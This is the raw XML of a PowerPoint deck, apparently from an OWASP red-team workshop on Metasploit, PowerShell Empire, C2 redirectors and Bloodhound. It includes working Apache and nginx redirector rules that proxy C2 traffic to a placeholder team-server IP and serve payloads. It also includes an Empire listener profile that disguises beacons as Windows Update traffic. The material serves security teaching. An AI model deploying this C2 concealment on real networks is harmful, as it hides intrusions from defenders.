              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>redirector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>.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E8DE3DF-FBB6-0746-9698-49EE833FB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09602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da-DK" sz="2400" dirty="0"/>
              <a:t>root@0wasp.dk:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1"/>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0"/>
              <a:t> /var/www/html/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>RewriteEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> On</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>RewriteCond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> %{REQUEST_URI} ^/(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>get.php|login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>process.php|news.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>)/?$ [NC]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>RewriteRule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> ^.*$ http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>[team-server-IP]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>%{REQUEST_URI} [P]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>RewriteRule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t> ^.*$ http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0" err="1"/>
              <a:t>owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1800" dirty="0"/>
              <a:t>/ [L,R=302]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/infosecn1nja/e2modrewrite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564624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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>C2 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>redirector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>)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E8DE3DF-FBB6-0746-9698-49EE833FB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096022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dirty="0"/>
              <a:t># Serve payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>location /load-pay {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try_files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uri.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uri.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =302;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Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>location ~ ^/update(.*) {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proxy_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://[team-server-IP]:80;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Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>location ~ ^/(admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>get.php|news.php|login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>process.php|download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>more.php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err="1"/>
              <a:t>proxy_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://[team-server-IP]:80;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Catch all to toss the rest at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>owasp.org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location / {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proxy_pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>owasp.org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35283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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>Empire profiles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E8DE3DF-FBB6-0746-9698-49EE833FB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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>uselistener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>microsoftupdate</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>DefaultJitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> 20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>DefaultDelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>DefaultProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> /c/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>msdownload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>others</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/2013/11/9946821_f5082b8340ec384b69f.cab|</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="da-DK" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40|</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="da-DK" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Host:download.windowsupdate.com|Accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>:*/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Content-Type:application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>vnd.ms-cab-compressed|Server:Microsoft-IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/8.5|MSRegion:N. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>America|Connection:keep-alive|X-Powered-By:ASP.NET</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK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Source:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/infosecn1nja/e2modrewrite/blob/master/profiles/normal/microsoftupdate.profile</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Setup database!:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/EmpireProject/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50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39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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>Empire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>staging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E8DE3DF-FBB6-0746-9698-49EE833FB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09602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a-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Billede 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F0DF8A-5752-194C-A09F-B0D74D657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9950" y="2146300"/>
            <a:ext cx="2324100" cy="850900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Billede 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B580A87-EF0A-4242-923F-0405068B8A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696" b="4303"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804784" y="972000"/>
            <a:ext cx="5573824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33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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>Noter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E8DE3DF-FBB6-0746-9698-49EE833FB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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>skynet.c0nscia.dk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c2.0wasp.dk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.hackingtutorials.org/metasploit-tutorials/exploiting-vsftpd-metasploitable/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36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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0" err="1"/>
              <a:t>Bloodhound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E8DE3DF-FBB6-0746-9698-49EE833FB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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# apt install bloodhound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# neo4j start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>Change DB password: http://localhost:7474</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# bloodhound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637064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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0" err="1"/>
              <a:t>Bloodhound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> ingestor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E8DE3DF-FBB6-0746-9698-49EE833FB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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# pip3 install bloodhound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>bloodhound-python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> -h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>”To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> the ingestor, at a minimum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need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> of the domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>you're</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> in to.”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249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2756DC-D91B-FC43-A0B9-A08C7ECE7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Agenda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>.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405242E-9089-314E-ABF5-36B280FB8C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a-DK" sz="2000" dirty="0" err="1"/>
              <a:t>Prerequisites</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>Terms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>Architectural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>ideas</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>Redirectors</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>Empire – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>advanced</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>Bloodhound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168614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3CBE5-0801-054C-A5F9-198D8B12C8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/>
              <a:t>Dennis Perto	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8FAD38E5-6090-7A43-AF20-1B82CCB2C6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dirty="0"/>
              <a:t>Sr. Security Analyst – Conscia SOC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370637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DB7BB4-6BC5-FF4E-AC42-6DE1792F2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Prerequisites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380D5B38-B54F-654B-9DE1-0BBA64B73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Attacker Linux machine (Kali preferred)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework (with Armitage?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Empire </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirector Linux machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/iptables (“dumb pipe”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>apache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optional: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable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657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1A00EF-F84C-E440-A6A1-916015A64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da-DK" dirty="0"/>
              <a:t>Terms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22949A1-B23B-AE4D-AD0B-DA4357F4C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09602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Team Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Staged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Stageless</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirector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732151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1A00EF-F84C-E440-A6A1-916015A64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da-DK" dirty="0"/>
              <a:t>Terms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>.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22949A1-B23B-AE4D-AD0B-DA4357F4C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4114800" cy="309602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Team Server (tools)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handler </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload (shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listener </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload (shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirector (proxy)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Pladsholder til indhold 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55064F8-B0B2-184E-94A0-2A709EDA38AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1200150"/>
            <a:ext cx="4114800" cy="30960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Bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r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992C7ECF-772A-0C49-9644-8779C1DFA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639024"/>
            <a:ext cx="3969544" cy="11091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Billede 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF679DF0-55E2-7745-ACDE-EDF88BB3A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3432" y="3145894"/>
            <a:ext cx="3893344" cy="11081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4022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lede 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A3F605-C5B5-DE44-BE1F-82661B518A0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1531" y="510564"/>
            <a:ext cx="7500937" cy="32479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20128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lede 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93A046D8-9128-F24A-9E88-C8E078972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1575" y="154782"/>
            <a:ext cx="5720850" cy="4988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592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rugerdefineret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756</TotalTime>
  <Words>1048</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Skærmshow (16:9)</PresentationFormat>
  <Paragraphs>181</Paragraphs>
  <Slides>26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2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slidetitler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Brugerdefineret design</vt:lpstr>
      <vt:lpstr>OWASP Workshop</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda cont.</vt:lpstr>
      <vt:lpstr>Dennis Perto </vt:lpstr>
